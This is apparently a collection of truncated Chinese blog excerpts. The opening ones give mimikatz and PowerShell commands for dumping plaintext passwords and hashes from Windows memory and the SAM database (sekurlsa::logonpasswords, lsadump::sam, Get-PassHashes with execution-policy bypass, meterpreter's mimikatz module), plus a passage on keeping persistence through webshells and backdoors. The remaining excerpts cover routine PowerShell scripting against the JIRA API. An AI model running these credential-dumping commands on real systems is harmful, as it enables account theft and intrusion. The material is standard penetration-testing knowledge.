mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法. 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便. 以管理员权限启动CMD执行下以命令即可: view source 1 powershell "…

在线抓密码 1.mimikatz privilege::debug token::whoami token::elevate lsadump::sam mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" 2.ps脚本 使用Get-PassHashes.ps1 powershell -exec bypass Import-Module .\Get-PassHashes.PS1 Get-PassHashe…

当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马…

法一: https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 注:请以管理员权限!!! (什么?要管理员权限!有管理员权限了还要你干嘛....) 法二: meterreter下已集成了mimikata meterpreter > load mimikatz meterpreter > wd…

通过调用JIRA Rest web api实现统计自动化,首先进行登录模拟: $content = @{username='用户名';password='密码'} $JSON=$content|convertto-JSON -Compress $res = Invoke-WebRequest -Uri "http://jira地址/rest/auth/1/session" -Method Post -Body $JSON -ContentType application/json $w…

通过PowerShell的invoke-webrequest和net.client联合实现个人指定项目jira提交数的统计,其中涉及到了JSON对象的提交,代码如下: $content = @{username='用户名';password='密码'} $JSON = $content|convertto-JSON -Compress $jiraUri = "http://jira.ms.netease.com" $apiUri = $jiraUri+"/rest/auth/…

Powershell将信息存储在对象中,每个对象都会有一个具体的类型,简单的文本会以System.String类型存储,日期会以System.DateTime类型存储.任何.NET对象都可以通过GetType()方法返回它的类型,该类型中有一个FullName属性,可以查看类型的完整名称. PS C:Powershell> $date=get-date PS C:Powershell> $date 2012年1月11日 15:19:49 PS C:Powershell> $date.Ge…

引言 笔者在<PowerShell 远程执行任务>一文中提到了在脚本中使用用户名和密码的基本方式: $Username = 'xxxx' $Password = 'yyyy' $Pass = ConvertTo-SecureString $Password -AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$Pass 上面的代码仅仅是能…

背景: 最近要开始做K3Cloud移动,BOS平台的移动单据收费,就想单独做移动模块,搭建环境:后台SSH2,前端Android.在手机端登录时通过Ajax方式传递用户名和密码到后台校验,后台在去K3Cloud的数据库中进行匹配,那么问题来了!数据库中的密码是经过SHA1加密的,要匹配首先得先把手机客户端传过来的密码加密.呵呵--金蝶的加密方式我们不得而知,就算知道,在Java平台不一定能搞出来,我今天研究了一天发现结果对不上,最后放弃了,决定试试用Java调C#的方法去直接调用K3Cloud封…

之前记录过一篇添加带验证的webservice,但是公司的另一个项目是.net framework2.0的项目,没有服务引用,只能添加web引用. 现在记录和分享一下方法: 先添加web引用,选择wsdl文件路径,添加引用. var svc = new 服务名(); svc.Credentials = new NetworkCredential("用户名", "密码"); var result = svc.服务方法(); 然后直接调用服务方法就可以了.…